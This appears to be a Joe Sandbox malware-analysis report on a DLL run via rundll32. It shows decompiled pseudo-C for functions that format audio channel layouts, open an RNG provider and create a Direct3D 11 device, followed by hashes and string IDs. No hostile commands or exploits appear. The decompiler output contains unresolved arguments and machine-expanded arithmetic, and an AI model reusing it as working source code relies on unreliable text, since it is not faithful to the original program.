                                                                      														 *((intOrPtr*)(_t435 + _t211 + 0x2c)) = 0;
                                                                      														_t211 = _t211 + 8;
                                                                      													} while (_t211 < 0x18);
                                                                      													if( *_t428 == 3) {
                                                                      														_t330 = _t428[8];
                                                                      														_t435[0xa] = 1;
                                                                      														_t284 = _t428[0xc];
                                                                      														_t435[0xc] = _t330;
                                                                      														_t435[0xd] = _t284;
                                                                      														_t227 = (((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) + ((((_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) >> 0x00000004) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) & 0x33333333) + (_t284 - (_t284 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) & 0x0f0f0f0f) >> 8);
                                                                      														_t406 = _t227 >> 0x10;
                                                                      														_t435[0xb] = ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) + ((((_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t330 - (_t330 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) >> 0x00000008) >> 0x00000010) & 0x0000003f) + (_t227 + (_t227 >> 0x00000010) & 0x0000003f);
                                                                      													} else {
                                                                      														_t284 = 2;
                                                                      														_t435[0xa] = 2;
                                                                      														_t435[0xb] = _t329 - _t406;
                                                                      														_t435[0xc] = _t428[8] + (_t406 + _t406 * 2) * 8;
                                                                      													}
                                                                      													 *_t435 = _t390;
                                                                      													_t435[2] = 1;
                                                                      													_t435[1] = 0x2b;
                                                                      													L10008D20();
                                                                      													_t435[1] = _t390;
                                                                      													 *_t435 =  &(_t435[0xa]);
                                                                      													E1000D4D0(_t284, _t390, _t406);
                                                                      												}
                                                                      												return 0;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										L72:
                                                                      										return 0xffffffea;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						if(_t142 == 0) {
                                                                      							_t148 = _t423[4];
                                                                      							goto L59;
                                                                      						} else {
                                                                      							_t421 = _t423[8];
                                                                      							_t243 = 4;
                                                                      							_t333 = 0;
                                                                      							_t289 = _t423[0xc];
                                                                      							_t381 = 0;
                                                                      							while((_t333 ^ _t289 | _t243 ^ _t421) != 0) {
                                                                      								_t381 =  &(1[_t381]);
                                                                      								if(_t381 == 0x1f) {
                                                                      									L14:
                                                                      									_t145 = _t423[4];
                                                                      									if(_t145 != 0) {
                                                                      										_t432[2] = _t145;
                                                                      										_t432[1] = "%d channels (";
                                                                      										 *_t432 = _t432[6];
                                                                      										L100089C0();
                                                                      										_t395 = _t423[4];
                                                                      										if(_t395 > 0) {
                                                                      											_t425 = 0;
                                                                      											_t386 = _t423;
                                                                      											goto L19;
                                                                      											do {
                                                                      												do {
                                                                      													L19:
                                                                      													if(_t425 >= _t395) {
                                                                      														L57:
                                                                      														_t432[1] = 0x100b1acf;
                                                                      														 *_t432 = _t432[6];
                                                                      														L100089C0();
                                                                      														goto L24;
                                                                      													} else {
                                                                      														_t160 =  *_t386;
                                                                      														if(_t160 == 2) {
                                                                      															_t292 =  *(_t386[8] + (_t425 + _t425 * 2) * 8);
                                                                      															_t250 = _t292 - 0x400;
                                                                      															if(_t425 != 0) {
                                                                      																_t432[4] = _t292;
                                                                      																_t432[1] = 0x100b1acf;
                                                                      																 *_t432 = _t432[6];
                                                                      																L100089C0();
                                                                      																_t292 = _t432[4];
                                                                      															}
                                                                      															if(_t250 > 0x3ff) {
                                                                      																goto L53;
                                                                      															} else {
                                                                      																goto L51;
                                                                      															}
                                                                      														} else {
                                                                      															if(_t160 == 3) {
                                                                      																_t178 = _t386[8];
                                                                      																_t432[4] = _t178;
                                                                      																_t432[5] = _t386[0xc];
                                                                      																_t397 = _t395 - (((((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000010) + (((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t178 - (_t178 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t178 - (_t178 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) & 0x0000003f) + ((((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 
0x0f0f0f0f) >> 0x00000008) >> 0x00000010) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) + (((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) + ((_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t432[5] - (_t432[5] >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) & 0x0f0f0f0f) >> 0x00000008) & 0x0000003f);
                                                                      																_t272 = _t425 - _t397;
                                                                      																if(_t425 >= _t397) {
                                                                      																	goto L32;
                                                                      																} else {
                                                                      																	_t250 = 0;
                                                                      																	if(_t425 == 0) {
                                                                      																		L51:
                                                                      																		_t432[2] = _t250;
                                                                      																		_t432[1] = "AMBI%d";
                                                                      																		 *_t432 = _t432[6];
                                                                      																		L100089C0();
                                                                      																	} else {
                                                                      																		_t250 = _t425;
                                                                      																		_t432[1] = 0x100b1acf;
                                                                      																		_t64 = _t425 + 0x400; // 0x401
                                                                      																		_t432[4] = _t64;
                                                                      																		 *_t432 = _t432[6];
                                                                      																		L100089C0();
                                                                      																		_t292 = _t432[4];
                                                                      																		if(_t425 <= 0x3ff) {
                                                                      																			goto L51;
                                                                      																		} else {
                                                                      																			goto L47;
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																if(_t160 == 1) {
                                                                      																	_t272 = _t425;
                                                                      																	_t432[4] = _t386[8];
                                                                      																	_t432[5] = _t386[0xc];
                                                                      																	L32:
                                                                      																	_t432[7] = _t425;
                                                                      																	_t182 = _t432[4];
                                                                      																	_t292 = 0;
                                                                      																	_t351 = _t432[5];
                                                                      																	_t426 = _t386;
                                                                      																	do {
                                                                      																		_t387 = _t351;
                                                                      																		_t399 = (_t387 << 0x00000020 | _t182) >> _t292;
                                                                      																		_t388 = _t387 >> _t292;
                                                                      																		if((_t292 & 0x00000020) != 0) {
                                                                      																			_t399 = _t388;
                                                                      																		}
                                                                      																		if((_t399 & 0x00000001) == 0) {
                                                                      																			goto L34;
                                                                      																		} else {
                                                                      																			_t49 = _t272 - 1; // 0x0
                                                                      																			_t402 = _t49;
                                                                      																			if(_t272 != 0) {
                                                                      																				_t272 = _t402;
                                                                      																				goto L34;
                                                                      																			} else {
                                                                      																				_t386 = _t426;
                                                                      																				_t425 = _t432[7];
                                                                      																				if(_t425 != 0) {
                                                                      																					_t432[4] = _t292;
                                                                      																					_t432[1] = 0x100b1acf;
                                                                      																					 *_t432 = _t432[6];
                                                                      																					L100089C0();
                                                                      																					_t292 = _t432[4];
                                                                      																					L53:
                                                                      																					if(_t292 <= 0x28) {
                                                                      																						goto L41;
                                                                      																					} else {
                                                                      																						if(_t292 != 0xffffffff) {
                                                                      																							goto L47;
                                                                      																						} else {
                                                                      																							goto L24;
                                                                      																						}
                                                                      																					}
                                                                      																				} else {
                                                                      																					if(_t292 > 0x28) {
                                                                      																						L47:
                                                                      																						_t432[2] = _t292;
                                                                      																						_t432[1] = "USR%d";
                                                                      																						 *_t432 = _t432[6];
                                                                      																						L100089C0();
                                                                      																					} else {
                                                                      																						L41:
                                                                      																						_t163 =  *(0x100b2280 + _t292 * 8);
                                                                      																						if(_t163 == 0) {
                                                                      																							goto L47;
                                                                      																						} else {
                                                                      																							_t432[2] = _t163;
                                                                      																							_t432[1] = "%s";
                                                                      																							 *_t432 = _t432[6];
                                                                      																							L100089C0();
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																		goto L25;
                                                                      																		L34:
                                                                      																		_t292 =  &(1[_t292]);
                                                                      																	} while (_t292 != 0x40);
                                                                      																	_t386 = _t426;
                                                                      																	_t425 = _t432[7];
                                                                      																	if(_t425 == 0) {
                                                                      																		goto L24;
                                                                      																	} else {
                                                                      																		goto L57;
                                                                      																	}
                                                                      																	goto L29;
                                                                      																} else {
                                                                      																	if(_t425 != 0) {
                                                                      																		goto L57;
                                                                      																	}
                                                                      																	L24:
                                                                      																	_t432[1] = "NONE";
                                                                      																	 *_t432 = _t432[6];
                                                                      																	L100089C0();
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													L25:
                                                                      													if( *_t386 != 2) {
                                                                      														goto L18;
                                                                      													} else {
                                                                      														_t341 = _t386[8];
                                                                      														_t166 = _t425 + _t425 * 2;
                                                                      														_t293 = _t341 + _t166 * 8;
                                                                      														if( *((char*)(_t341 + 4 + _t166 * 8)) == 0) {
                                                                      															goto L18;
                                                                      														} else {
                                                                      															goto L27;
                                                                      														}
                                                                      													}
                                                                      													goto L29;
                                                                      													L27:
                                                                      													_t425 =  &(1[_t425]);
                                                                      													_t432[2] = _t293 + 4;
                                                                      													_t432[1] = "@%s";
                                                                      													 *_t432 = _t432[6];
                                                                      													L100089C0();
                                                                      													_t395 = _t386[4];
                                                                      												} while (_t395 > _t425);
                                                                      												goto L29;
                                                                      												L18:
                                                                      												_t395 = _t386[4];
                                                                      												_t425 =  &(1[_t425]);
                                                                      											} while (_t395 > _t425);
                                                                      										}
                                                                      										L29:
                                                                      										if(_t395 == 0) {
                                                                      											goto L15;
                                                                      										} else {
                                                                      											_t432[1] = 0x100b1ad1;
                                                                      											 *_t432 = _t432[6];
                                                                      											L100089C0();
                                                                      											_t144 = 0;
                                                                      										}
                                                                      									} else {
                                                                      										L15:
                                                                      										_t148 = 0;
                                                                      										L59:
                                                                      										_t432[2] = _t148;
                                                                      										_t432[1] = "%d channels";
                                                                      										 *_t432 = _t432[6];
                                                                      										L100089C0();
                                                                      										_t144 = 0;
                                                                      									}
                                                                      								} else {
                                                                      									_t337 = _t381 << 5;
                                                                      									_t6 = _t337 + 0x100b1c90; // 0x0
                                                                      									_t243 =  *_t6;
                                                                      									_t7 = _t337 + 0x100b1c94; // 0x0
                                                                      									_t333 =  *_t7;
                                                                      									continue;
                                                                      								}
                                                                      								goto L12;
                                                                      							}
                                                                      							_t382 = _t381 << 5;
                                                                      							_t432[1] = "%s";
                                                                      							_t9 = _t382 + 0x100b1c80; // 0x100b1abb
                                                                      							_t432[2] =  *_t9;
                                                                      							 *_t432 = _t432[6];
                                                                      							L100089C0();
                                                                      							L8:
                                                                      							_t144 = 0;
                                                                      						}
                                                                      						L12:
                                                                      						return _t144;
                                                                      					}
                                                                      				}
                                                                      				L90:
                                                                      			}































































                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprintf
                                                                      • String ID: %d channels$%d channels ($@%s$AMBI%d$NONE$USR%d
                                                                      • API String ID: 3083893021-1306170362
                                                                      • Opcode ID: 98ded283bb3ae70f21cce0f44d25f16bdae0512caeeaba98897a65d1631d7c3f
                                                                      • Instruction ID: 96990cf085468aa9ba630c0c0793423886e9eba89b3e303bf26647e4a11a856d
                                                                      • Opcode Fuzzy Hash: 98ded283bb3ae70f21cce0f44d25f16bdae0512caeeaba98897a65d1631d7c3f
                                                                      • Instruction Fuzzy Hash: 8BB1A675A087068BD714EF28C48066EB7E1FF882D0F55892EE989C7345EB31ED44CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$AlgorithmProvider_close_readmvpriv_open$CloseOpenRandomclock
                                                                      • String ID: Microsoft Primitive Provider$N$RNG
                                                                      • API String ID: 4139849330-2077157618
                                                                      • Opcode ID: ba0f5cf16dd16bf2a74f44db4dfaca41cdcaddc0f25a1e0faec0a639bd5545d4
                                                                      • Instruction ID: 55d25eed0a1b74d277015fe739bb6a08acfe9f0c77a35e4a57d9ad1f3d4738c5
                                                                      • Opcode Fuzzy Hash: ba0f5cf16dd16bf2a74f44db4dfaca41cdcaddc0f25a1e0faec0a639bd5545d4
                                                                      • Instruction Fuzzy Hash: E891A075A043508FE304DF78C9C021ABBE2FBC9311F51897EE9889B365EB75D9448B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 30%
                                                                      			E1001F523(intOrPtr _a4, intOrPtr _a12) {
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v64;
                                                                      				intOrPtr _v96;
                                                                      				signed int _v100;
                                                                      				char _v320;
                                                                      				char _v328;
                                                                      				intOrPtr _v336;
                                                                      				intOrPtr _v344;
                                                                      				intOrPtr _v352;
                                                                      				void* _v356;
                                                                      				signed int _v360;
                                                                      				char _v364;
                                                                      				intOrPtr* _v368;
                                                                      				intOrPtr _v376;
                                                                      				intOrPtr _v384;
                                                                      				signed int _v388;
                                                                      				char _v392;
                                                                      				void* _v396;
                                                                      				intOrPtr _v400;
                                                                      				intOrPtr* _v404;
                                                                      				intOrPtr* _v408;
                                                                      				void* _v412;
                                                                      				CHAR* _v416;
                                                                      				signed int _v420;
                                                                      				char _v424;
                                                                      				int _v428;
                                                                      				void* _v452;
                                                                      				char* _v456;
                                                                      				intOrPtr _v460;
                                                                      				char _v464;
                                                                      				intOrPtr _v468;
                                                                      				intOrPtr _v472;
                                                                      				char _v476;
                                                                      				intOrPtr _v480;
                                                                      				void* _t93;
                                                                      				struct HINSTANCE__* _t94;
                                                                      				intOrPtr _t102;
                                                                      				void* _t108;
                                                                      				intOrPtr* _t109;
                                                                      				char _t110;
                                                                      				void* _t111;
                                                                      				intOrPtr* _t112;
                                                                      				intOrPtr* _t115;
                                                                      				void* _t116;
                                                                      				struct HINSTANCE__* _t117;
                                                                      				_Unknown_base(*)()* _t118;
                                                                      				void* _t119;
                                                                      				intOrPtr* _t120;
                                                                      				intOrPtr* _t122;
                                                                      				intOrPtr* _t124;
                                                                      				void* _t127;
                                                                      				void* _t134;
                                                                      				int _t136;
                                                                      				void* _t140;
                                                                      				intOrPtr* _t142;
                                                                      				intOrPtr* _t144;
                                                                      				_Unknown_base(*)()* _t146;
                                                                      				intOrPtr _t147;
                                                                      				signed int _t152;
                                                                      				char _t155;
                                                                      				intOrPtr _t162;
                                                                      				intOrPtr _t163;
                                                                      				intOrPtr _t164;
                                                                      				intOrPtr _t165;
                                                                      				intOrPtr* _t169;
                                                                      				intOrPtr* _t191;
                                                                      				intOrPtr _t194;
                                                                      				void* _t195;
                                                                      				void* _t198;
                                                                      				void* _t200;
                                                                      				void* _t201;
                                                                      				intOrPtr* _t202;
                                                                      				intOrPtr* _t204;
                                                                      				intOrPtr* _t205;
                                                                      
                                                                      				_v328 = 0;
                                                                      				_t191 =  *((intOrPtr*)(_a4 + 0xc));
                                                                      				_t93 = E100110D0(_a12, "debug", 0, 0);
                                                                      				_t94 = LoadLibraryA("d3d11_1sdklayers.dll");
                                                                      				_t200 = _t198 - 0x178;
                                                                      				if(_t93 == 0 || _t94 == 0) {
                                                                      					_t194 = 0x800;
                                                                      					_v344 = 0;
                                                                      				} else {
                                                                      					_t194 = 0x802;
                                                                      					_v344 = 1;
                                                                      				}
                                                                      				_v396 = 0x100d7268;
                                                                      				_v320 = 0;
                                                                      				_t152 =  &_v320;
                                                                      				_v384 = 0;
                                                                      				_v388 = _t152;
                                                                      				_v392 = 0;
                                                                      				__imp__InitOnceBeginInitialize();
                                                                      				_t201 = _t200 - 0x10;
                                                                      				if(_v336 != 0) {
                                                                      					_v356 = L100A7C1C("d3d11.dll", 0, 0);
                                                                      					_t102 = L100A7C1C("dxgi.dll", 0, 0);
                                                                      					_t155 = _v356;
                                                                      					if(_t155 != 0) {
                                                                      						_v352 = _t102;
                                                                      						if(_t102 != 0) {
                                                                      							_v412 = _t155;
                                                                      							_v408 = "D3D11CreateDevice";
                                                                      							_v356 = GetProcAddress;
                                                                      							_t146 = GetProcAddress(??, ??);
                                                                      							_v416 = "CreateDXGIFactory1";
                                                                      							_t169 = _v364;
                                                                      							 *0x100d7260 = _t146;
                                                                      							_v420 = _v360;
                                                                      							_t147 =  *_t169(0, 0);
                                                                      							_push(_t169);
                                                                      							_push(_t169);
                                                                      							 *0x100d7264 = _t147;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_v412 = 0x100d7268;
                                                                      				_v404 = 0;
                                                                      				_v408 = 0;
                                                                      				__imp__InitOnceComplete();
                                                                      				_t202 = _t201 - 0xc;
                                                                      				if( *0x100d7260 == 0) {
                                                                      					L29:
                                                                      					E10026560(_v24, 0x10, "Failed to load D3D11 library or its functions\n");
                                                                      					goto L30;
                                                                      				} else {
                                                                      					_t109 =  *0x100d7264;
                                                                      					if(_t109 == 0) {
                                                                      						goto L29;
                                                                      					}
                                                                      					if(_v20 != 0) {
                                                                      						_v420 = _t152;
                                                                      						_v424 = 0x100c75a0;
                                                                      						_t134 =  *_t109();
                                                                      						_t202 = _t202 - 8;
                                                                      						if(_t134 >= 0) {
                                                                      							 *_t202 = _v28;
                                                                      							_t136 = atoi(??);
                                                                      							_v424 =  &_v364;
                                                                      							_v428 = _t136;
                                                                      							 *_t202 = _v356;
                                                                      							_t140 =  *((intOrPtr*)( *_v356 + 0x1c))();
                                                                      							_t205 = _t202 - 0xc;
                                                                      							if(_t140 < 0) {
                                                                      								_v376 = 0;
                                                                      								_t142 = _v368;
                                                                      								 *_t205 = _t142;
                                                                      								 *((intOrPtr*)( *_t142 + 8))();
                                                                      								_t202 = _t205 - 4;
                                                                      							} else {
                                                                      								_t144 = _v368;
                                                                      								 *_t205 = _t144;
                                                                      								 *((intOrPtr*)( *_t144 + 8))();
                                                                      								_t202 = _t205 - 4;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t110 = _v356;
                                                                      					if(_t110 != 0) {
                                                                      						_v420 = _t152;
                                                                      						_v424 = _t110;
                                                                      						_t127 =  *((intOrPtr*)( *_t110 + 0x20))();
                                                                      						_t202 = _t202 - 8;
                                                                      						if(_t127 >= 0) {
                                                                      							_v412 = _t152;
                                                                      							_v416 = _v96;
                                                                      							_v420 = _v100;
                                                                      							_v424 = "Using device %04x:%04x (%ls).\n";
                                                                      							_v428 = 0x20;
                                                                      							 *_t202 = _v32;
                                                                      							E10026560();
                                                                      						}
                                                                      						_t110 = _v364;
                                                                      					}
                                                                      					_v412 = _t194;
                                                                      					_v388 = 0;
                                                                      					_v392 = 0;
                                                                      					_v400 = 7;
                                                                      					_v404 = 0;
                                                                      					_v408 = 0;
                                                                      					_v396 = _t191;
                                                                      					_v416 = 0;
                                                                      					_v420 = 0 | _t110 == 0x00000000;
                                                                      					_v424 = _t110;
                                                                      					_t111 =  *0x100d7260();
                                                                      					_t202 = _t202 - 0x28;
                                                                      					_t195 = _t111;
                                                                      					_t112 = _v396;
                                                                      					if(_t112 != 0) {
                                                                      						_v464 = _t112;
                                                                      						 *((intOrPtr*)( *_t112 + 8))();
                                                                      						_t202 = _t202 - 4;
                                                                      					}
                                                                      					if(_t195 < 0) {
                                                                      						E10026560(_v64, 0x10, "Failed to create Direct3D device (%lx)\n", _t195);
                                                                      						L30:
                                                                      						_t108 = 0xb1b4b1ab;
                                                                      						goto L19;
                                                                      					} else {
                                                                      						_t115 =  *_t191;
                                                                      						_v456 =  &_v392;
                                                                      						_v460 = 0x100c70d0;
                                                                      						_v464 = _t115;
                                                                      						_t116 =  *((intOrPtr*)( *_t115))();
                                                                      						_t202 = _t202 - 0xc;
                                                                      						if(_t116 >= 0) {
                                                                      							_t122 = _v404;
                                                                      							_v472 = 1;
                                                                      							_v476 = _t122;
                                                                      							 *((intOrPtr*)( *_t122 + 0x14))();
                                                                      							_t204 = _t202 - 8;
                                                                      							_t124 = _v412;
                                                                      							 *_t204 = _t124;
                                                                      							 *((intOrPtr*)( *_t124 + 8))();
                                                                      							_t202 = _t204 - 4;
                                                                      						}
                                                                      						if(_v424 != 0) {
                                                                      							_t117 = LoadLibraryA("dxgidebug.dll");
                                                                      							_t202 = _t202 - 4;
                                                                      							if(_t117 != 0) {
                                                                      								_t118 = GetProcAddress(_t117, "DXGIGetDebugInterface");
                                                                      								_t202 = _t202 - 8;
                                                                      								if(_t118 != 0) {
                                                                      									_v472 = _t152;
                                                                      									_v400 = 0;
                                                                      									_v476 = 0x100c7530;
                                                                      									_t119 =  *_t118();
                                                                      									_t202 = _t202 - 8;
                                                                      									if(_t119 >= 0) {
                                                                      										_t120 = _v408;
                                                                      										if(_t120 != 0) {
                                                                      											_v464 = 7;
                                                                      											_t162 =  *0x100c6e30; // 0xe48ae283
                                                                      											 *_t202 = _t120;
                                                                      											_v480 = _t162;
                                                                      											_t163 =  *0x100c6e34; // 0x490bda80
                                                                      											_v476 = _t163;
                                                                      											_t164 =  *0x100c6e38; // 0xe943e687
                                                                      											_v472 = _t164;
                                                                      											_t165 =  *0x100c6e3c; // 0x8dacfa9
                                                                      											_v468 = _t165;
                                                                      											 *((intOrPtr*)( *_t120 + 0xc))();
                                                                      											_t202 = _t202 - 0x18;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_t108 = 0;
                                                                      						L19:
                                                                      						return _t108;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InitOnce$BeginCompleteInitializeLibraryLoadmv_dict_get
                                                                      • String ID: DXGIGetDebugInterface$Failed to create Direct3D device (%lx)$Failed to load D3D11 library or its functions$Using device %04x:%04x (%ls).$d3d11.dll$debug$dxgi.dll
                                                                      • API String ID: 2640887736-2754084114
                                                                      • Opcode ID: 46d71de76901be22f43a985af2c852e585d150c4c55c8bf33d4014df43fd258f
                                                                      • Instruction ID: b26665e88cdb3ff3bd93bc6ff27e16a968a577adae798b8ccfa67922602f4651
                                                                      • Opcode Fuzzy Hash: 46d71de76901be22f43a985af2c852e585d150c4c55c8bf33d4014df43fd258f
                                                                      • Instruction Fuzzy Hash: 4EB1E4B4A087419FD354EF69D58462ABBF1FF89740F41892EE989CB354EB34D884CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E100132D0() {
                                                                      				void* _t43;
                                                                      				intOrPtr _t61;
                                                                      				intOrPtr _t63;
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr _t67;
                                                                      				signed int _t72;
                                                                      				signed int _t73;
                                                                      				signed int _t74;
                                                                      				signed int _t75;
                                                                      				intOrPtr* _t78;
                                                                      				intOrPtr* _t84;
                                                                      				intOrPtr* _t87;
                                                                      				intOrPtr* _t93;
                                                                      				void* _t94;
                                                                      				intOrPtr* _t95;
                                                                      
                                                                      				_t95 = _t94 - 0x2c;
                                                                      				_t87 =  *((intOrPtr*)(_t95 + 0x40));
                                                                      				if(_t87 != 0) {
                                                                      					if( *((intOrPtr*)(_t87 + 0xc)) == 0) {
                                                                      						L4:
                                                                      						_t84 =  *((intOrPtr*)(_t87 + 0x1c));
                                                                      						if(_t84 == 0) {
                                                                      							L21:
                                                                      							 *_t95 =  *_t87;
                                                                      							L23();
                                                                      							 *_t95 =  *((intOrPtr*)(_t87 + 8));
                                                                      							L23();
